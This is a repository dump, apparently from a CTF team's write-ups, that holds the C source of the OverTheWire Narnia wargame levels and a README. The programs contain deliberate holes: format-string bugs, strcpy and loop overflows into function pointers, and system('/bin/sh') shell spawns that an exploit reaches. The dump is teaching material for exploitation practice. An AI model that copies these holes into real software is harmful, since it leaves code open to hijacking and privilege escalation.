| This program is distributed in the hope that it will be useful, 8 | but WITHOUT ANY WARRANTY; without even the implied warranty of 9 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 10 | GNU General Public License for more details. 11 | 12 | You should have received a copy of the GNU General Public License 13 | along with this program; if not, write to the Free Software 14 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 15 | */ 16 | #include 17 | #include 18 | #include 19 | 20 | int main(int argc, char **argv){ 21 | int i = 1; 22 | char buffer[64]; 23 | 24 | snprintf(buffer, sizeof buffer, argv[1]); 25 | buffer[sizeof (buffer) - 1] = 0; 26 | printf("Change i's value from 1 -> 500. "); 27 | 28 | if(i==500){ 29 | printf("GOOD\n"); 30 | system("/bin/sh"); 31 | } 32 | 33 | printf("No way...let me give you a hint!\n"); 34 | printf("buffer : [%s] (%d)\n", buffer, strlen(buffer)); 35 | printf ("i = %d (%p)\n", i, &i); 36 | return 0; 37 | } 38 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia6/narnia6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Narnia/Narnia6/narnia6 -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia6/narnia6.c: -------------------------------------------------------------------------------- 1 | /* 2 | This program is free software; you can redistribute it and/or modify 3 | it under the terms of the GNU General Public License as published by 4 | the Free Software Foundation; either version 2 of the License, or 5 | (at your option) any later version. 6 | 7 | This program is distributed in the hope that it will be useful, 8 | but WITHOUT ANY WARRANTY; without even the implied warranty of 9 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 10 | GNU General Public License for more details. 11 | 12 | You should have received a copy of the GNU General Public License 13 | along with this program; if not, write to the Free Software 14 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 15 | */ 16 | #include 17 | #include 18 | #include 19 | 20 | extern char **environ; 21 | 22 | // tired of fixing values... 23 | // - morla 24 | unsigned long get_sp(void) { 25 | __asm__("movl %esp,%eax\n\t" 26 | "and $0xff000000, %eax" 27 | ); 28 | } 29 | 30 | int main(int argc, char *argv[]){ 31 | char b1[8], b2[8]; 32 | int (*fp)(char *)=(int(*)(char *))&puts, i; 33 | 34 | if(argc!=3){ printf("%s b1 b2\n", argv[0]); exit(-1); } 35 | 36 | /* clear environ */ 37 | for(i=0; environ[i] != NULL; i++) 38 | memset(environ[i], '\0', strlen(environ[i])); 39 | /* clear argz */ 40 | for(i=3; argv[i] != NULL; i++) 41 | memset(argv[i], '\0', strlen(argv[i])); 42 | 43 | strcpy(b1,argv[1]); 44 | strcpy(b2,argv[2]); 45 | //if(((unsigned long)fp & 0xff000000) == 0xff000000) 46 | if(((unsigned long)fp & 0xff000000) == get_sp()) 47 | exit(-1); 48 | fp(b1); 49 | 50 | exit(1); 51 | } 52 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia7/narnia7: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Narnia/Narnia7/narnia7 -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia7/narnia7.c: -------------------------------------------------------------------------------- 1 | /* 2 | This program is free software; you can redistribute it and/or modify 3 | it under the terms of the GNU General Public License as published by 4 | the Free Software Foundation; either version 2 of the License, or 5 | (at your option) any later version. 6 | 7 | This program is distributed in the hope that it will be useful, 8 | but WITHOUT ANY WARRANTY; without even the implied warranty of 9 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 10 | GNU General Public License for more details. 11 | 12 | You should have received a copy of the GNU General Public License 13 | along with this program; if not, write to the Free Software 14 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 15 | */ 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | int goodfunction(); 23 | int hackedfunction(); 24 | 25 | int vuln(const char *format){ 26 | char buffer[128]; 27 | int (*ptrf)(); 28 | 29 | memset(buffer, 0, sizeof(buffer)); 30 | printf("goodfunction() = %p\n", goodfunction); 31 | printf("hackedfunction() = %p\n\n", hackedfunction); 32 | 33 | ptrf = goodfunction; 34 | printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf); 35 | 36 | printf("I guess you want to come to the hackedfunction...\n"); 37 | sleep(2); 38 | ptrf = goodfunction; 39 | 40 | snprintf(buffer, sizeof buffer, format); 41 | 42 | return ptrf(); 43 | } 44 | 45 | int main(int argc, char **argv){ 46 | if (argc <= 1){ 47 | fprintf(stderr, "Usage: %s \n", argv[0]); 48 | exit(-1); 49 | } 50 | exit(vuln(argv[1])); 51 | } 52 | 53 | int goodfunction(){ 54 | printf("Welcome to the goodfunction, but i said the Hackedfunction..\n"); 55 | fflush(stdout); 56 | 57 | return 0; 58 | } 59 | 60 | int hackedfunction(){ 61 | printf("Way to go!!!!"); 62 | fflush(stdout); 63 | system("/bin/sh"); 64 | 65 | return 0; 66 | } 67 | -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia8/narnia8: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/Misc/OverTheWire/Narnia/Narnia8/narnia8 -------------------------------------------------------------------------------- /Misc/OverTheWire/Narnia/Narnia8/narnia8.c: -------------------------------------------------------------------------------- 1 | /* 2 | This program is free software; you can redistribute it and/or modify 3 | it under the terms of the GNU General Public License as published by 4 | the Free Software Foundation; either version 2 of the License, or 5 | (at your option) any later version. 6 | 7 | This program is distributed in the hope that it will be useful, 8 | but WITHOUT ANY WARRANTY; without even the implied warranty of 9 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 10 | GNU General Public License for more details. 11 | 12 | You should have received a copy of the GNU General Public License 13 | along with this program; if not, write to the Free Software 14 | Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 15 | */ 16 | #include 17 | #include 18 | #include 19 | // gcc's variable reordering fucked things up 20 | // to keep the level in its old style i am 21 | // making "i" global unti i find a fix 22 | // -morla 23 | int i; 24 | 25 | void func(char *b){ 26 | char *blah=b; 27 | char bok[20]; 28 | //int i=0; 29 | 30 | memset(bok, '\0', sizeof(bok)); 31 | for(i=0; blah[i] != '\0'; i++) 32 | bok[i]=blah[i]; 33 | 34 | printf("%s\n",bok); 35 | } 36 | 37 | int main(int argc, char **argv){ 38 | 39 | if(argc > 1) 40 | func(argv[1]); 41 | else 42 | printf("%s argument\n", argv[0]); 43 | 44 | return 0; 45 | } 46 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | #CTF Writeups 2 | by: Alpackers 3 | 4 | The Alpackers were formed in early 2015 by industry professionals who wanted to break things and learn. This is our attempt to contribute back. 5 | 6 | To date we have participated in the following events: 7 | * PlaidCTF 2015 8 | * PoliCTF 2015 9 | * CSAW CTF Qualification Round 2015 10 | * Boston Key Party 2016 11 | * Ice CTF 2016 12 | * Hack the Vote 2016 13 | * Boston Key Party 2017 14 | --------------------------------------------------------------------------------